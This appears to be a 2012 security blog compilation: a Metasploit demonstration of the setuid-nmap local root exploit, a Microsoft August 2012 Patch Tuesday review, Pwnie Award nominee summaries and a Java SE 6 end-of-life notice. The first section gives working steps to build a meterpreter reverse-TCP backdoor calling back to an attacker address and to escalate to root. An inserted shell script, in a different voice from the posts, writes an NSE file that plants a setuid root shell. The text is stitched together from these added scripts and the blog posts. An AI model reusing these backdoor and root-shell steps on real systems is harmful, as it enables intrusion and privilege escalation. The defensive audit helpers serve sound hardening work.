Setuid Nmap Exploit Metasploit Demo

Timeline :

Metasploit PoC provided on 2012-06-13

PoC provided by :

egypt

Reference(s) :

None

Affected version(s) :

All Nmap versions with setuid

Tested on CentOS release 6.2 with :

Nmap 6.01

Description :

Nmap’s man page mentions that “Nmap should never be installed with special privileges (e.g. suid root) for security reasons..” and specifically avoids making any of its binaries setuid during installation. Nevertheless, administrators sometimes feel the need to do insecure things. This module abuses a setuid nmap binary by writing out a Lua NSE script containing a call to os.execute(). Note that modern interpreters will refuse to run scripts on the command line when EUID != UID, so the cmd/unix/reverse_{perl,ruby} payloads will most likely not work.

Commands :

You need an active session on the target; in this demo the session is obtained through a backdoor generated with msfpayload.

sudo msfpayload linux/x86/meterpreter/reverse_tcp LHOST=192.168.178.100 X > backdoor

Upload the backdoor to the target and run it there, then catch the connection with a handler:

use exploit/multi/handler
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit -j

sysinfo
getuid

use exploit/unix/local/setuid_nmap
set Nmap /usr/local/bin/nmap
set SESSION 1
set TARGET 1
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid
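As an added example (not the original post's commands and not the Metasploit module's own code), the following POSIX shell helpers show both sides of what the module relies on: finding a setuid-root nmap, the kind of NSE file whose os.execute() call inherits nmap's effective uid, and the one-line remediation. The NSE content, the install path in the usage comment and the command passed to os.execute() are assumptions; the module's generated script is equivalent in effect but is not reproduced here.

```shell
#!/bin/sh
# Added example: audit a host for the setuid-nmap misconfiguration and show
# the minimal NSE file that turns it into code execution as root.
# Not code from the original post or from the Metasploit module.

# Print setuid-root regular files on local filesystems: what a local
# attacker enumerates first after landing a session.
find_setuid_root() {
    find / -xdev -type f -perm -4000 -user root 2>/dev/null
}

# Return 0 if $1 is an existing regular file with the setuid bit set.
is_setuid() {
    [ -f "$1" ] && [ -u "$1" ]
}

# Return 0 if $1 is setuid AND owned by root: the combination that makes
# 'nmap --script' run Lua with an effective uid of 0.
is_setuid_root() {
    is_setuid "$1" || return 1
    [ "$(ls -ld "$1" | awk '{print $3}')" = root ]
}

# Write an NSE script of the kind the module drops: os.execute() runs $2
# with nmap's effective uid. Constructed here; only nmap executes it, and
# only when the caller passes it with --script.
write_nse_poc() {
    out=$1; cmd=$2
    cat > "$out" <<EOF
-- constructed PoC script (assumption: equivalent to the module's output)
description = "setuid nmap PoC"
categories = {"safe"}
hostrule = function(host) return true end
action = function(host, port)
    os.execute("$cmd")
end
EOF
}

# Remediation: drop the bit, then confirm it is really gone.
clear_setuid() {
    chmod u-s "$1" && ! is_setuid "$1"
}

# Usage, as the attacker in the session would (path is an assumption):
#   write_nse_poc /tmp/x.nse 'cp /bin/sh /tmp/rootsh; chmod u+s /tmp/rootsh'
#   /usr/local/bin/nmap --script /tmp/x.nse 127.0.0.1
# Usage, as the administrator should:
#   find_setuid_root | grep nmap && clear_setuid /usr/local/bin/nmap
```

The check is the one that matters for defenders: if is_setuid_root succeeds on any nmap binary, every user who can run nmap can run arbitrary commands as root, whatever the rest of the system's hardening looks like.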

Microsoft August 2012 Patch Tuesday Review

On 14 August 2012, during its August Patch Tuesday, Microsoft released two security advisories and nine security bulletins. Of the nine security bulletins, five carry a Critical severity rating.

Microsoft Security Advisory 2661254

MSA-2661254 is a consequence of the Flame malware attacks. Microsoft now allows the use of certificates with RSA keys shorter than 1024 bits to be restricted. This MSA will be pushed as a security update during the October 2012 Patch Tuesday, so you have two months to assess the impact of this update. We strongly recommend that you test this MSA before pushing it to all your Windows systems; KB-2661254 lists the known issues with this security update. For example, Internet Explorer will no longer allow access to a website secured with an RSA certificate whose key length is less than 1024 bits.
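Assessing the impact means finding the RSA certificates under 1024 bits before the October push. The following POSIX shell functions, added here and not part of the advisory or of KB-2661254, use the openssl command line to read the key size out of a PEM certificate, out of a directory of exported certificates, or out of a live TLS endpoint; the file names, directory and host in the usage comment are assumptions, and certificates from a Windows store must first be exported to PEM or DER-converted .crt files.

```shell
#!/bin/sh
# Added example: flag RSA certificates below the 1024-bit floor that
# KB-2661254 enforces. Requires the openssl CLI; not code from the advisory.

# Print the RSA modulus size (bits) of a PEM certificate; print nothing and
# return 2 if the file is unreadable or the key is not RSA.
cert_rsa_bits() {
    text=$(openssl x509 -in "$1" -noout -text 2>/dev/null) || return 2
    case $text in
        *"Public Key Algorithm: rsaEncryption"*) ;;
        *) return 2 ;;
    esac
    printf '%s\n' "$text" |
        sed -n 's/.*Public-Key: (\([0-9][0-9]*\) bit).*/\1/p' | head -n 1
}

# Return 0 if the certificate's RSA key has at least $2 bits (default 1024,
# the new minimum), 1 if it is weaker, 2 if it could not be assessed.
check_cert_key_length() {
    cert=$1; min=${2:-1024}
    bits=$(cert_rsa_bits "$cert") || return 2
    [ -n "$bits" ] || return 2
    if [ "$bits" -lt "$min" ]; then
        printf 'WEAK %s: RSA %s bits (< %s)\n' "$cert" "$bits" "$min"
        return 1
    fi
    printf 'OK   %s: RSA %s bits\n' "$cert" "$bits"
}

# Scan every *.pem / *.crt in a directory; return 1 if any RSA key is weak.
# Non-RSA certificates are reported as skipped, not as failures.
scan_cert_dir() {
    dir=$1; min=${2:-1024}; rc=0
    for f in "$dir"/*.pem "$dir"/*.crt; do
        [ -f "$f" ] || continue
        r=0
        check_cert_key_length "$f" "$min" || r=$?
        [ "$r" -eq 2 ] && printf 'SKIP %s: not an RSA certificate\n' "$f"
        [ "$r" -eq 1 ] && rc=1
    done
    return $rc
}

# Fetch the leaf certificate of a TLS endpoint and check it the same way;
# this is the case Internet Explorer will refuse after the update.
check_server_key_length() {
    host=$1; port=${2:-443}; min=${3:-1024}
    tmp=$(mktemp) || return 2
    openssl s_client -connect "$host:$port" -servername "$host" </dev/null 2>/dev/null |
        openssl x509 -outform PEM > "$tmp" 2>/dev/null
    check_cert_key_length "$tmp" "$min"; r=$?
    rm -f "$tmp"
    return $r
}

# Usage (paths and host are assumptions):
#   scan_cert_dir /etc/pki/tls/certs
#   check_server_key_length intranet.example.com 443
```

Run the directory scan against exported copies of the enterprise CA and server certificates, and the endpoint check against every internal HTTPS site users reach with Internet Explorer; anything reported WEAK must be reissued before the update ships through Windows Update.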

Microsoft Security Advisory 2737111

MSA-2737111 deals with vulnerabilities in third-party code, the Oracle Outside In libraries, that affect Microsoft Exchange Server 2007, Microsoft Exchange Server 2010, and FAST Search Server 2010 for SharePoint. These Oracle vulnerabilities were patched in Oracle's July 2012 quarterly Critical Patch Update. The MS12-058 security bulletin addresses this issue for Microsoft Exchange. Note that these Oracle Outside In vulnerabilities have been publicly disclosed.

MS12-052 – Cumulative Security Update for Internet Explorer

The MS12-052 security update, classified as Critical and allowing remote code execution, fixes four privately reported vulnerabilities. CVE-2012-1526 has a CVSS base score of 9.3 and was discovered and privately reported by GWSlabs. CVE-2012-2521 has a CVSS base score of 9.3 and was discovered and privately reported by Derek Soeder. CVE-2012-2522 has a CVSS base score of 9.3 and was discovered and privately reported by Sung-ting Tsai and Ming-Chieh Pan of Trend Micro. CVE-2012-2523 has a CVSS base score of 9.3 and was discovered and privately reported by Cris Neckar of Google’s Chrome Security Team.

MS12-053 – Vulnerability in Remote Desktop Could Allow Remote Code Execution

The MS12-053 security update, classified as Critical and allowing remote code execution, fixes one vulnerability, CVE-2012-2526. This vulnerability has a CVSS base score of 9.3 and was discovered and privately reported by Edward Torkington.

MS12-054 – Vulnerabilities in Windows Networking Components Could Allow Remote Code Execution

The MS12-054 security update, classified as Critical and allowing remote code execution, fixes four privately reported vulnerabilities. All of them were reported by Yamata Li. CVE-2012-1850 has a CVSS base score of 5.0. CVE-2012-1851, CVE-2012-1852 and CVE-2012-1853 have a CVSS base score of 10.0.

MS12-055 – Vulnerability in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege

The MS12-055 security update, classified as Important and allowing elevation of privilege, fixes one vulnerability, CVE-2012-2527. This vulnerability has a CVSS base score of 7.2 and was discovered and privately reported by Mateusz Jurczyk of Google Inc.

MS12-056 – Vulnerability in JScript and VBScript Engines Could Allow Remote Code Execution

The MS12-056 security update, classified as Important and allowing remote code execution, fixes one vulnerability, CVE-2012-2523 (the same JScript/VBScript issue also addressed in MS12-052). This vulnerability has a CVSS base score of 9.3 and was discovered and privately reported by Cris Neckar of Google’s Chrome Security Team.

MS12-057 – Vulnerability in Microsoft Office Could Allow Remote Code Execution

The MS12-057 security update, classified as Important and allowing remote code execution, fixes one vulnerability, CVE-2012-2524. This vulnerability has a CVSS base score of 9.3 and was discovered and privately reported by Andrei Costin.

MS12-058 – Vulnerabilities in Microsoft Exchange Server WebReady Document Viewing Could Allow Remote Code Execution

The MS12-058 security update, classified as Critical and allowing remote code execution, fixes 13 vulnerabilities discovered in third-party code, the Oracle Outside In libraries. These vulnerabilities have been publicly disclosed.

MS12-059 – Vulnerability in Microsoft Visio Could Allow Remote Code Execution

The MS12-059 security update, classified as Important and allowing remote code execution, fixes one vulnerability, CVE-2012-1888. This vulnerability has a CVSS base score of 9.3 and was discovered and privately reported by Alexander Gavrun.

MS12-060 – Vulnerability in Windows Common Controls Could Allow Remote Code Execution

The MS12-060 security update, classified as Critical and allowing remote code execution, fixes one vulnerability, CVE-2012-1856. This vulnerability has a CVSS base score of 9.3 and was discovered and privately reported by an unnamed security researcher.

Pwnie Awards 2012 nominees announced

The 6th edition of “The Pwnie Awards” will hold its awards ceremony at the Black Hat USA conference in Las Vegas on 25 July. The Pwnie Awards celebrate the achievements and failures of security researchers and the security community.

In the 2012 edition there are nine award categories, among them:

  • Pwnie for Best Server-Side Bug
  • Pwnie for Best Client-Side Bug
  • Pwnie for Best Privilege Escalation Bug
  • Pwnie for Most Innovative Research
  • Pwnie for Lamest Vendor Response
  • Pwnie for Best Song
  • Pwnie for Most Epic FAIL
  • Pwnie for Epic Ownage

Nominees for these categories were announced on 21 July. I will do a quick recap of the “Best Server-Side Bug“, “Best Client-Side Bug” and “Best Privilege Escalation Bug“ categories.

Pwnie for Best Server-Side Bug

Nominees for this category are listed here under. My vote will go to “WordPress Timthumb Plugin ‘timthumb’ Cache Directory Arbitrary File Upload Vulnerability” due to the impact of this vulnerability in terms of the number of botnets and owned servers.

TNS Poison Attack (CVE-2012-1675)

This vulnerability was discovered and reported to Oracle by Joxean Koret in 2008. Oracle announced, in the April CPU, that the vulnerability was fixed, but after releasing details of the vulnerability Joxean Koret discovered that it was not fixed at all. Below, a video demonstration of the MITM attack.

ProFTPD Response Pool Use-after-Free (CVE-2011-4130)

This vulnerability was discovered and reported by an anonymous researcher in October 2011 and patched in November 2011. It allows remote attackers to execute arbitrary code. Authentication is required to exploit it, since the vulnerable code is only reachable through the FTP command set available after login.

“Are we there yet?” MySQL Authentication Bypass (CVE-2012-2122)

This vulnerability was discovered and reported to Oracle by Sergei Golubchik in April 2012. It is a password-check bypass in MySQL: an attacker who knows a valid user name can log in without knowing the password. Below, a video demonstration of the attack.

WordPress Timthumb Plugin ‘timthumb’ Cache Directory Arbitrary File Upload Vulnerability (CVE-2011-4106)

Since the discovery of the WordPress TimThumb vulnerability in August 2011 by Mark Maunder, the vulnerability has been used as a botnet recruitment vector and has now spread across multiple botnets. Hundreds of WordPress blogs have been hacked, allowing potential infection of the blogs' visitors, distribution of spam and phishing campaigns, DDoS, compromise of other web sites (such as the About.us domain name registrar), etc. Some of these infected WordPress sites were controlled by well-known C&C servers used and shared by black hats from around the world.

Pwnie for Best Client-Side Bug

Nominees for this category are listed here under. My vote will go to “MS11-087: Unspecified win32k.sys TrueType font parsing engine vulnerability” because this vulnerability demonstrates clearly that the bad guys are always ahead.

Pinkie Pie’s Pwnium Exploit

Pinkie Pie’s exploit took a chain of six different bugs in order to successfully break out of the Chrome sandbox.

Sergey Glazunov’s Pwnium Exploit (CVE-2011-3046)

Sergey Glazunov’s exploit took a chain of at least 14 bugs to successfully sidestep the browser’s sandbox.

MS11-087: Unspecified win32k.sys TrueType font parsing engine vulnerability (CVE-2011-3402)

CVE-2011-3402, patched by MS11-087 in December 2011, was found exploited in the wild by the Duqu malware.

Flash BitmapData.histogram() Info Leak (CVE-2012-0769)

CVE-2012-0769 was discovered by Fermin J. Serna of the Google Security Team and corrected in APSB12-05.

iOS Code Signing Bypass (CVE-2011-3442)

This vulnerability was discovered by Charlie Miller of Accuvant Labs and corrected in the iOS 5.0.1 release. It is a code signing bypass that allows a third-party app to dynamically download and execute unsigned code, which Miller demonstrated in a rogue app of his own.

Pwnie for Best Privilege Escalation Bug

Nominees for this category are listed here under. My vote will go to “Xen Intel x64 SYSRET Privilege Escalation” because this vulnerability impacts tons of products and vendors.

Xen Intel x64 SYSRET Privilege Escalation (CVE-2012-0217)

This vulnerability was discovered and reported to the vendor by Rafal Wojtczuk. A successful demonstration of this vulnerability was provided by fail0verflow on 2012-07-05. Below, a video demonstration of the attack.

iOS HFS Catalog File Integer Underflow (CVE-2012-0642)

This vulnerability was discovered by pod2g and used in the Absinthe iOS 5.0/5.0.1 jailbreak.

MS11-098: Windows Kernel Exception Handler Vulnerability (CVE-2011-2018)

CVE-2011-2018, patched by MS11-098, was discovered and reported to the vendor by Mateusz “j00ru” Jurczyk.

VMware High-Bandwidth Backdoor ROM Overwrite Privilege Elevation (CVE-2012-1515)

CVE-2012-1515, patched by MS12-042 and by VMSA-2012-0006.2, was discovered and reported to vendors by Derek Soeder.

Oracle Push Java SE 7 Update to Uninstall Version 6

The last release of Java SE 6, version 6 update 33 (1.6.0_33-b03), was published on 12 June 2012 as part of the quarterly Oracle Java CPU (Critical Patch Update). This CPU fixed 14 security vulnerabilities in earlier Java SE product versions 7, 6, 5 and 4. One of these vulnerabilities was CVE-2012-1723, which is currently being used by the Blackhole exploit kit.

Metasploit exploitation demonstration of CVE-2012-1723

For a few days now you may have seen a notification on your system asking you to update Java.

Looking at the details of the update, you will see that Java SE 7 update 5 (1.7.0_05) is available and that installing this update will remove your previous version of Java SE. However, if you wish to keep Java 6 you will need to update from the offline Java installer to the latest version of Java SE, which is version 7 update 5. Huh! What a choice: I can update to version 7, or update to version 7.

As you may know, Java SE 6 will no longer be supported after November 2012. The last Java CPU update is planned for 12 October 2012. After November 2012, Oracle will no longer post updates of Java SE 6 to its public download sites. For enterprise customers who need continued access to critical bug fixes and security fixes, as well as general maintenance for Java SE 6 or older versions, long-term support is available through Oracle Java SE Support. But it seems, through this forced Java SE update to version 7, that Java SE 6 update 33 was the last one.

So we encourage you to plan a major rollout across your infrastructure, because Java SE 6 seems to be officially dead!